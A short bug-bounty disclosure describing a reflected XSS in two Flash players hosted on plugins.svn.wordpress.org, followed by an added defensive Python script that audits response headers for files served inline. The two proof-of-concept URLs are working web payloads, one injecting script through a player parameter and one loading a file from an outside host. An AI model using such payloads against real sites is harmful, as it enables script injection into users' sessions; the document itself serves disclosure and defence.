Aug 28, 2018

Reflected SWF XSS at https://plugins.svn.wordpress.org


Program: WordPress
Vulnerability: XSS
Bounty: $350

Affected files:
video-js.swf
moxieplayer.swf

Description

https://plugins.svn.wordpress.org is the site plugins are downloaded from, so the SWF and PHP files it hosts are not loaded in the browser: every file is served as a download. The exceptions are video-js.swf and moxieplayer.swf, which load normally on the site.

PoC:
https://plugins.svn.wordpress.org/1player/tags/1.3/players/video-js/video-js.swf?readyFunction=alert(%27Hello%27)
https://plugins.svn.wordpress.org/agile-video-player/trunk/js/plugins/media/moxieplayer.swf?url=hekimuso1973.xsl.pt/723.flv
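An added example, not part of the original post: a small audit a site owner could run over response headers to find files on a download-only host that would be executed in the site's origin instead of saved. It assumes "download" is enforced with Content-Disposition: attachment; the header values are constructed, and the function names and the example-plugin paths are hypothetical.

```python
# Added example. Header sets are constructed, not captured from the real host.
ACTIVE_TYPES = {
    "application/x-shockwave-flash",
    "text/html",
    "application/xhtml+xml",
    "image/svg+xml",
}

def _lower(headers):
    # HTTP header names are case-insensitive, so normalise before lookup.
    return {k.lower(): v for k, v in headers.items()}

def media_type(headers):
    """Content-Type without parameters, lower-cased ('' if absent)."""
    return _lower(headers).get("content-type", "").split(";", 1)[0].strip().lower()

def forced_download(headers):
    """True when Content-Disposition tells the client to save the body."""
    disp = _lower(headers).get("content-disposition", "")
    return disp.split(";", 1)[0].strip().lower() == "attachment"

def served_inline(headers):
    """Active content type that is not forced to download."""
    return media_type(headers) in ACTIVE_TYPES and not forced_download(headers)

def audit(responses):
    """Return the paths whose responses would run instead of download."""
    return [path for path, headers in responses if served_inline(headers)]

SAMPLE = [
    ("/1player/tags/1.3/players/video-js/video-js.swf",
     {"Content-Type": "application/x-shockwave-flash"}),
    ("/agile-video-player/trunk/js/plugins/media/moxieplayer.swf",
     {"Content-Type": "application/x-shockwave-flash; charset=binary"}),
    ("/example-plugin/trunk/player.swf",   # hypothetical path
     {"Content-Type": "application/x-shockwave-flash",
      "Content-Disposition": 'attachment; filename="player.swf"'}),
    ("/example-plugin/trunk/admin.php",    # hypothetical path
     {"Content-Type": "application/octet-stream",
      "content-disposition": "attachment"}),
    ("/example-plugin/trunk/readme.txt",   # hypothetical path
     {"Content-Type": "text/plain"}),
]

if __name__ == "__main__":
    for path in audit(SAMPLE):
        print("served inline:", path)
```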







Security Researcher at Many Websites - Bug Hunter - Civil Engineer Student
